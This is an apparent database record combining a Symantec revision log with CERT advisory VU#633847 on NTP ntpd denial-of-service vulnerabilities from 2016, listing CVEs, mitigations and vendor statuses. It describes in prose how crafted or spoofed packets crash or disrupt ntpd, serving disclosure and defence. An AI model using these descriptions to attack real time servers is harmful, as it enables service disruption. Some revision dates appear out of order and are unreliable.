[http://www.kb.cert.org/vuls/id/633847](<https://www.kb.cert.org/vuls/id/633847>) \n \n\n\n### REVISION \n\n2020-04-26 Advanced Secure Gateway (ASG) 7.1 and later versions are not vulnerable because a fix is available in 7.1.1.1. Advisory status changed to Closed. \n2019-10-02 Web Isolation is not vulnerable. \n2019-08-10 SSLV 3.x has a vulnerable version of the NTP reference implementation, but is not vulnerable to known vectors of attack. \n2019-08-07 A fix for ASG 6.6 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-01-21 Security Analytics 8.0 is not vulnerable because a fix is available in SA 8.0.1. \n2019-01-12 A fix for Security Analytics 7.1 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-01-11 A fix for CA 2.1 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-08-07 A fix for CA 1.3 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-06-25 A fix for SSLV 3.11 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-04-26 A fix for SSLV 4.0 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-04-25 A fix for XOS 9.7 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-04-22 CAS 2.3 is not vulnerable. Reporter 10.1 prior to 10.1.5.5 is vulnerable to CVE-2016-7429, CVE-2016-7431, and CVE-2016-7433. Reporter 10.2 is not vulnerable because a fix is available in 10.2.1.1. \n2018-01-31 A fix for ASG 6.7 is avaialble in 6.7.3.1. \n2017-11-16 A fix for SSLV 3.9 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-11-09 MC 1.11 is not vulnerable because a fix is available in 1.11.1.1. A fix for MC 1.10 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-11-08 CA 2.2 is not vulnerable because a fix is available in 2.2.1.1. \n2017-11-06 ASG 6.7 has a vulnerable version of the NTP reference implementation, but is not vulnerable to known vectors of attack. \n2017-08-03 SSLV 4.1 is not vulnerable because a fix is available in 4.1.1.1. \n2017-03-30 MC 1.10 is vulnerable to CVE-2016-7431 and CVE-2016-7433. It also has a vulnerable version of the NTP reference implementation for CVE-2016-7426, CVE-2016-7429, CVE-2016-9310, CVE-2016-9311, and CVE-2016-9312 but is not vulnerable to known vectors of attack. A fix for MC 1.9 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-06-22 Security Analytics 7.3 is not vulnerable. \n2016-06-10 Corrected advisory to say that SSLV 3.9, 3.10, and 3.11 are not vulnerable to CVE-2016-7431. Also, CA, MC, and SSLV are not vulnerable to known vectors of attack for CVE-2016-9312. SSLV 3.8.4FC is vulnerable to CVE-2016-7433. SSLV 3.8.4FC also has a vulnerable version of the ntp.org NTP reference implementation for CVE-2016-7426, CVE-2016-9310, CVE-2016-9311, and CVE-2016-9312, but is not vulnerable to known vectors of attack. \n2017-05-29 A fix for Security Analytics 6.6 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-05-18 CAS 2.1 is vulnerable to CVE-2016-7429, CVE-2016-7431, CVE-2016-7433, and CVE-2016-9312. \n2017-04-30 A fix for Director 6.1 is available in 6.1.23.1. \n2017-03-30 MC 1.9 is vulnerable to CVE-2016-7431, CVE-2016-7433, and CVE-2016-9312. \n2017-03-09 A fix for Security Analytics 7.2 is available in 7.2.3. \n2017-03-08 SSLV 4.0 is vulnerable to CVE-2016-7431, CVE-2016-7433, and CVE-2016-9312. \n2017-01-12 initial public release \n2016-01-23 Added CVSS v2 base scores from National Vulnerability Database (NVD)\n", "modified": "2020-04-26T14:52:52", "published": "2017-01-12T08:00:00", "id": "SMNTC-1393", "href": "", "type": "symantec", "title": "SA139 : November 2016 NTP Security Vulnerabilities", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:19", "bulletinFamily": "info", "cvelist": ["CVE-2016-7426", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-7429", "CVE-2016-7431", "CVE-2016-7433", "CVE-2016-7434", "CVE-2016-9310", "CVE-2016-9311", "CVE-2016-9312"], "description": "### Overview \n\nNTP.org ntpd versions ntp-4.2.7p385 up to but not including ntp-4.2.8p9 and ntp-4.3.0 up to but not including ntp-4.3.94 contain multiple denial of service vulnerabilities.\n\n### Description \n\nNTP.org's ntpd, versions ntp-4.2.7p385 up to but not including ntp-4.2.8p9 and ntp-4.3.0 up to but not including ntp-4.3.94, contain multiple denial of service vulnerabilities.\n\n[**CWE-476**](<http://cwe.mitre.org/data/definitions/476.html>)**: NULL Pointer Dereference - **CVE-2016-9311 \n \nAccording to NTP.org, \"ntpd does not enable trap service by default. If trap service has been explicitly enabled, an attacker can send a specially crafted packet to cause a null pointer dereference that will crash ntpd, resulting in a denial of service. Affects Windows only.\" \n \n[**CWE-400**](<http://cwe.mitre.org/data/definitions/400.html>)**: Uncontrolled Resource Consumption ('Resource Exhaustion') - **CVE-2016-9310 \n \nAccording to NTP.org, \"An exploitable configuration modification vulnerability exists in the control mode (mode 6) functionality of ntpd. If, against long-standing BCP recommendations, \"restrict default noquery ...\" is not specified, a specially crafted control mode packet can set ntpd traps, providing information disclosure and DDoS amplification, and unset ntpd traps, disabling legitimate monitoring. A remote, unauthenticated, network attacker can trigger this vulnerability.\" \n \n[**CWE-400**](<http://cwe.mitre.org/data/definitions/400.html>)**: Uncontrolled Resource Consumption ('Resource Exhaustion') - **CVE-2016-7427 \n \nAccording to NTP.org, \"The broadcast mode of NTP is expected to only be used in a trusted network. If the broadcast network is accessible to an attacker, a potentially exploitable denial of service vulnerability in ntpd's broadcast mode replay prevention functionality can be abused. An attacker with access to the NTP broadcast domain can periodically inject specially crafted broadcast mode NTP packets into the broadcast domain which, while being logged by ntpd, can cause ntpd to reject broadcast mode packets from legitimate NTP broadcast servers.\" \n \n \n[**CWE-400**](<http://cwe.mitre.org/data/definitions/400.html>)**: Uncontrolled Resource Consumption ('Resource Exhaustion') - **CVE-2016-7428 \n \nAccording to NTP.org, \"The broadcast mode of NTP is expected to only be used in a trusted network. If the broadcast network is accessible to an attacker, a potentially exploitable denial of service vulnerability in ntpd's broadcast mode poll interval enforcement functionality can be abused. To limit abuse, ntpd restricts the rate at which each broadcast association will process incoming packets. ntpd will reject broadcast mode packets that arrive before the poll interval specified in the preceding broadcast packet expires. An attacker with access to the NTP broadcast domain can send specially crafted broadcast mode NTP packets to the broadcast domain which, while being logged by ntpd, will cause ntpd to reject broadcast mode packets from legitimate NTP broadcast servers.\" \n \n[**CWE-410**](<http://cwe.mitre.org/data/definitions/410.html>)**: Insufficient Resource Pool - **CVE-2016-9312 \n \nAccording to NTP.org, \"If a vulnerable instance of ntpd on Windows receives a crafted malicious packet that is \"too big\", ntpd will stop working.\" \n \n[**CWE-20**](<http://cwe.mitre.org/data/definitions/20.html>)**: Improper Input Validation - **CVE-2016-7431 \n \nAccording to NTP.org, \"Zero Origin timestamp problems were fixed by Bug 2945 in ntp-4.2.8p6. However, subsequent timestamp validation checks introduced a regression in the handling of some Zero origin timestamp checks.\" \n \n[**CWE-20**](<http://cwe.mitre.org/data/definitions/20.html>)**: Improper Input Validation - **CVE-2016-7434 \n \nAccording to NTP.org, \"If ntpd is configured to allow mrulist query requests from a server that sends a crafted malicious packet, ntpd will crash on receipt of that crafted malicious mrulist query packet.\" \n \n[**CWE-605**](<http://cwe.mitre.org/data/definitions/605.html>)**: Multiple Binds to the Same Port -** CVE-2016-7429 \n \nAccording to NTP.org, \"When ntpd receives a server response on a socket that corresponds to a different interface than was used for the request, the peer structure is updated to use the interface for new requests. If ntpd is running on a host with multiple interfaces in separate networks and the operating system doesn't check source address in received packets (e.g. rp_filter on Linux is set to 0), an attacker that knows the address of the source can send a packet with spoofed source address which will cause ntpd to select wrong interface for the source and prevent it from sending new requests until the list of interfaces is refreshed, which happens on routing changes or every 5 minutes by default. If the attack is repeated often enough (once per second), ntpd will not be able to synchronize with the source.\" \n \n[**CWE-410**](<http://cwe.mitre.org/data/definitions/410.html>)**: Insufficient Resource Pool - **CVE-2016-7426 \n \nAccording to NTP.org, \"When ntpd is configured with rate limiting for all associations (restrict default limited in ntp.conf), the limits are applied also to responses received from its configured sources. An attacker who knows the sources (e.g., from an IPv4 refid in server response) and knows the system is (mis)configured in this way can periodically send packets with spoofed source address to keep the rate limiting activated and prevent ntpd from accepting valid responses from its sources.\" \n \n[**CWE-682**](<http://cwe.mitre.org/data/definitions/682.html>)**: Incorrect Calculation - **CVE-2016-7433 \n \nAccording to NTP.org, \"Bug 2085 described a condition where the root delay was included twice, causing the jitter value to be higher than expected. Due to a misinterpretation of a small-print variable in The Book, the fix for this problem was incorrect, resulting in a root distance that did not include the peer dispersion. The calculations and formulae have been reviewed and reconciled, and the code has been updated accordingly.\" \n \nFor more information, please see NTP.org's [security advisory](<http://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NTP_Se>).[](<http://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NT>)[](<nwtime.org/ntp428p9_release>) \n \nThe CVSS score below is based on CVE-2016-9312. \n \n--- \n \n### Impact \n\nA remote unauthenticated attacker may be able to perform a denial of service on ntpd. \n \n--- \n \n### Solution \n\n**Implement BCP-38.** \n \nUse \"`restrict default noquery ...`\" in your `ntp.conf` file. Only allow mode 6 queries from trusted networks and hosts. \n \n**Apply an update** \n \nUpgrade to [4.2.8p9](<nwtime.org/ntp428p9_release>), or later, from the NTP Project Download Page or the NTP Public Services Project Download Page. \n \n**Monitor ntpd** \n \nProperly monitor your ntpd instances, and auto-restart ntpd (without -g) if it stops running. \n \n--- \n \n### Vendor Information\n\n633847\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### NTP Project Affected\n\nUpdated: November 18, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CoreOS __ Not Affected\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n**Statement Date: November 21, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`CoreOS Container Linux, by default, is not affected by this since ntpd is disabled.`\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ACCESS Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### AT&T Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Alcatel-Lucent Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Apple Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Arch Linux Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Arista Networks, Inc. Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Aruba Networks Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Avaya, Inc. Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Barracuda Networks Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Belkin, Inc. Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Blue Coat Systems Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Brocade Communication Systems Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### CA Technologies Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### CMX Systems Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### CentOS Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Check Point Software Technologies Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Cisco Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Contiki OS Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### D-Link Systems, Inc. Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Debian GNU/Linux Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### DesktopBSD Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### DragonFly BSD Project Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### EMC Corporation Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### EfficientIP SAS Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Enterasys Networks Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Ericsson Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### European Registry for Internet Domains Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Extreme Networks Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### F5 Networks, Inc. Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fedora Project Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Force10 Networks Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fortinet, Inc. Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Foundry Brocade Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### FreeBSD Project Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### GNU adns Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### GNU glibc Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Gentoo Linux Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Google Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hardened BSD Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hewlett Packard Enterprise Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hitachi Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Huawei Technologies Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM Corporation Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Infoblox Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Intel Corporation Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Internet Systems Consortium Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Internet Systems Consortium - DHCP Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### JH Software Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Juniper Networks Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Lenovo Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Lynx Software Technologies Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### McAfee Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Microchip Technology Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Microsoft Corporation Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### NEC Corporation Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### NLnet Labs Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### NetBSD Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Nokia Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Nominum Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OmniTI Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OpenBSD Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OpenDNS Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Oracle Corporation Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Oryx Embedded Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Peplink Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### PowerDNS Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Q1 Labs Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### QNX Software Systems Inc. Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Quadros Systems Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Red Hat, Inc. Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Rocket RTOS Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SUSE Linux Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SafeNet Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Secure64 Software Corporation Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Slackware Linux Inc. Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SmoothWall Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Snort Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sony Corporation Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sourcefire Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Symantec Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### TCPWave Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### TippingPoint Technologies Inc. Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Tizen Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### TrueOS Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Turbolinux Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Ubuntu Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Unisys Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### VMware Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Wind River Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### WizNET Technology Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Xilinx Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Zephyr Project Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### ZyXEL Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### dnsmasq Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### gdnsd Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### m0n0wall Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### openSUSE project Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\nView all 100 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | 